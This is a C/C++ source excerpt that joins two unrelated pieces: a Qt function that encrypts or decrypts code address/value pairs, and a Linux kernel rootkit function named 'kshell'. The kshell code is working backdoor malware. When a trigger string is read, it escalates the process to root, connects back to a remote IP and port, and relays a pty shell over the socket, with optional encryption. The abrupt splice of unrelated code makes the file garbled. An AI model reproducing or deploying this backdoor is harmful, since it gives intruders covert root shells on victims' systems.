QString MainWindow::encryptLine(QString in, bool decrypt, bool v3)
{
bool ok;
unsigned int adress = in.left(8).toUInt(&ok, 16);
unsigned int value = in.right(8).toUInt(&ok, 16);
v3enc = v3;
deadface(0x0000);
if(decrypt)
decrypt_code(&adress, &value);
else
encrypt_code(&adress, &value);
QString ret, strAdress, strValue;
strAdress.setNum(adress, 16);
strValue.setNum(value, 16);
while(strAdress.length() < 8)
strAdress.prepend("0");
while(strValue.length() < 8)
strValue.prepend("0");
return strAdress.toUpper() + strValue.toUpper();
}
/**
* kshell - start a connect back shell in kernel space.
* @ip: remote ip to connect.
* @port: remote port to connect.
* both ip and port are network bytes.
*
* When the system call 'read' had read the flag 'wztshell',it will be use this
* function to start a connect back shell.
*
* return value is always NF_ACCEPT.It's not firewall,just want to filter the key.
*/
int kshell(int ip,int port)
{
//struct task_struct *ptr = current;
struct cred *ptr = (struct cred *)current->cred;
struct socket *sock;
struct sockaddr_in server;
struct winsize ws;
mm_segment_t old_fs;
fd_set s_read;
int soc, tmp_pid, i;
int byte1,count,rlen;
int error;
int len = sizeof(struct sockaddr);
char tmp[101],buf[101];
unsigned char *p,*d;
unsigned char wb[5];
old_fs = get_fs();
ptr->uid = 0;
ptr->euid = 0;
ptr->gid = SGID;
ptr->egid = 0;
set_fs(KERNEL_DS);
ssetmask(~0);
for (i = 0;i < 4096; i++)
close(i);
error = sock_create(AF_INET,SOCK_STREAM,0,&sock);
if (error < 0) {
#if DEBUG == 1
printk("[-] socket_create failed: %d\n",error);
#endif
sock_release(sock);
wztshell = 0;
e_exit(-1);
return -1;
}
//http://lkml.indiana.edu/hypermail/linux/kernel/0805.0/2937.html
soc = sock_map_fd(sock,0);
if (soc < 0) {
#if DEBUG == 1
printk("[-] sock_map_fd() failed.\n");
#endif
sock_release(sock);
wztshell = 0;
e_exit(-1);
return -1;
}
for (i = 0; i < 8; i++)
server.sin_zero[i] = 0;
server.sin_family = PF_INET;
server.sin_addr.s_addr = ip;
server.sin_port = port;
error = sock->ops->connect(sock,(struct sockaddr *)&server,len,sock->file->f_flags);
if (error < 0) {
#if DEBUG == 1
printk("[-] connect to failed.\n");
#endif
e_exit(-1);
return -1;
}
epty = get_pty();
set_fs(old_fs);
if (!(tmp_pid = fork()))
start_shell();
set_fs(KERNEL_DS);
/*
#if ENCRYPT == 1
encrypt_code(banner,200);
#endif
write(soc,banner,200);
*/
while (1) {
FD_ZERO(&s_read);
FD_SET(ptmx, &s_read);
FD_SET(soc, &s_read);
if (_newselect((ptmx > soc ? ptmx+1 : soc+1), &s_read, 0, 0, NULL) < 0)
break;
if (FD_ISSET(ptmx, &s_read)) {
byte1 = read(ptmx, tmp, 100);
if (byte1 <= 0)
break;
#if ENCRYPT == 1
encrypt_code(tmp,byte1);
#endif
write(soc, tmp, byte1);
}
if (FD_ISSET(soc, &s_read)) {
d = buf;
count = read(soc, buf, 100);
if (count <= 0)
break;
#if ENCRYPT == 1
encrypt_code(buf,count);
#endif
p = memchr(buf, ECHAR, count);
if (p) {
rlen = count - ((long) p - (long) buf);
/* wait for rest */
if (rlen > 5) rlen = 5;
memcpy(wb, p, rlen);
if (rlen < 5) {
read(soc, &wb[rlen], 5 - rlen);
#if ENCRYPT == 1
encrypt_code(&wb[rlen],5 - rlen);
#endif
}
/* setup window */
ws.ws_xpixel = ws.ws_ypixel = 0;
ws.ws_col = (wb[1] << 8) + wb[2];
ws.ws_row = (wb[3] << 8) + wb[4];
ioctl(ptmx, TIOCSWINSZ, (unsigned long)&ws);
kill(0, SIGWINCH);
/* write the rest */
write(ptmx, buf, (long) p - (long) buf);
rlen = ((long) buf + count) - ((long)p+5);
if (rlen > 0) write(ptmx, p+5, rlen);
} else
if (write(ptmx, d, count) <= 0) break;
}
}
kill(tmp_pid, SIGKILL);
set_fs(old_fs);
e_exit(0);
return -1;
}
